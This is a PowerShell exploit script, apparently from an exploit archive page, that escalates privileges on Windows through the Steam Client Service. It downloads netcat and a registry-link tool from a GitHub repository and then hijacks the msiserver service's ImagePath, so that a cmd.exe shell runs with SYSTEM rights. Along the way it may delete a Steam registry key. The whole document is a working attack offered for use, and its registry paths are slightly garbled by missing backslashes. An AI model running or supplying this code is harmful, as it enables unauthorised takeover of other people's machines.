Steam Windows client local privilege escalation exploit.

MD5 | 70f2ec205f8ac7a877ee45b923875fde

$SteamRegKey = "HKLM:SOFTWAREWOW6432NodeValveSteamNSIS"
$MSIRegKey = "HKLM:SYSTEMCurrentControlSetServicesmsiserver"
$RegDir = "C:WindowsTempRegLN.exe"
$PayDir = "C:WindowsTemppayload.exe"
$Payload = "c:windowssystem32cmd.exe /c c:windowstemppayload.exe 127.0.0.1 4444 -e cmd.exe"
$PayDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/nc.exe"
$RegDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/RegLN.exe"
$WebClient = New-Object System.Net.WebClient


If(!((Test-Path -Path $RegDir) -And (Test-Path -Path $PayDir)))
{
$WebClient.DownloadFile($PayDownload, $PayDir)
$WebClient.DownloadFile($RegDownload, $RegDir)
}

If(Get-ItemProperty -Path $SteamRegKey -Name ImagePath -ErrorAction SilentlyContinue)
{
Start-Service -DisplayName "Steam Client Service"
Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
Start-Service -Name "msiserver"
}
Else
{
Remove-Item -Path $SteamRegKey -Recurse
Start-Process -FilePath $RegDir -ArgumentList "HKLMSoftwareWow6432NodeValveSteamNSIS HKLMSYSTEMCurrentControlSetServicesmsiserver"
Start-Service -DisplayName "Steam Client Service"
Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
Start-Service -Name "msiserver"
}

Source